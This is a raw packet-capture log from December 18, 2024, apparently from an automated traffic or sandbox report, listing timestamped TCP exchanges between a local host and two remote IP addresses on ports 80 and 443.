                                                                                                                                                                                          Dec 18, 2024 09:07:23.839785099 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.839821100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.839868069 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.839931011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.840627909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.840661049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.840694904 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.840718031 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.840744019 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.841442108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.841495037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.841530085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.841568947 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.841630936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.842272997 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.842385054 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.842421055 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.842443943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.842473984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.843164921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.843199015 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.843234062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.843240023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.843269110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.843300104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.844028950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.844095945 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.844166994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.844202042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.844257116 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.845098019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.845170021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.845207930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.845210075 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.845246077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.845279932 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846060991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846115112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846149921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846162081 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846213102 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846213102 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846718073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846802950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846831083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846864939 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846904039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.846941948 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.847512007 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.847565889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.847575903 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.847600937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.847634077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.847671986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.848287106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.848371029 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009659052 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009733915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009773016 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009813070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009866953 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009886980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009902000 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.009967089 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.010693073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.010729074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.010765076 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.010807991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.010848045 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.011533976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.011586905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.011621952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.011663914 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.011718988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.012474060 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.012507915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.012546062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.012574911 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.012618065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.013346910 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.013380051 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.013413906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.013439894 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.013484955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.014079094 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.014170885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.014204025 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.014230013 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.014273882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.014986992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.015096903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.015130043 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.015166044 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.015223980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.015944004 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016056061 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016091108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016129017 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016179085 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016700983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016813993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016849041 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016869068 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.016904116 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.017666101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.017700911 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.017735958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.017756939 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.017791986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.018429995 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.018493891 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.018527985 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.018543959 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.018579006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.019332886 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.019395113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.019428968 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.019445896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.019479036 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.020245075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.020299911 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.020333052 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.020360947 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.020401001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.021162033 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.021198034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.021231890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.021255016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.021289110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.022037983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.022072077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.022108078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.022130966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.022166014 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.022933960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.022969007 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023005009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023035049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023066998 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023653984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023796082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023829937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023865938 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.023920059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.024564981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.024596930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.024611950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.024668932 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.025460005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.025475979 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.025490046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.025548935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.026276112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.026508093 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.026524067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.026577950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.027149916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.027360916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.027375937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.027471066 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.028151035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.028563976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.028578997 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.028594017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.028666019 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.028704882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.029249907 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.029264927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.029287100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.029330015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.029381037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.030046940 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.030209064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.030224085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.030266047 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.030313015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031101942 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031117916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031133890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031193018 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031228065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031848907 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031863928 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031878948 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031917095 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.031965971 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.032646894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.032732964 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.032747984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.032794952 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.032845020 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.033575058 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.033626080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.033658981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.033687115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.033735991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.034512997 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.034547091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.034580946 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.034599066 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.034631968 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.035366058 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.035398006 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.035451889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.035458088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.035497904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.036226034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.036259890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.036281109 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.036294937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.036299944 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.036340952 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.037161112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.037221909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.037362099 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.037396908 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.037416935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.037440062 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.038245916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.038335085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.038369894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.038419008 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.038479090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.039391041 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.039503098 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.039510012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.039537907 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.039566994 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.039597034 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.040618896 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.042514086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.062098980 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.062216997 CET49717443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:24.063996077 CET49717443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:24.064019918 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.064944983 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.067578077 CET49717443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:24.067828894 CET49717443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:24.067886114 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.067953110 CET49717443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:24.115338087 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201231003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201251030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201267958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201389074 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201481104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201606989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201623917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201641083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201694965 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.201778889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.202440023 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.202455997 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.202471972 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.202513933 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.203305960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.203367949 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.203383923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.203397989 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.203453064 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204078913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204176903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204191923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204265118 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204298973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204881907 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204942942 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204957962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.204993963 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.205048084 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.205797911 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.205892086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.205909967 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.205936909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.205990076 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.206635952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.206695080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.206726074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.206754923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.206796885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.207499027 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.207612038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.207628012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.207690954 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.207741976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.208436012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.208451986 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.208467960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.208493948 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.208530903 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.209464073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.209480047 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.209495068 CET804971431.41.244.11192.168.2.8
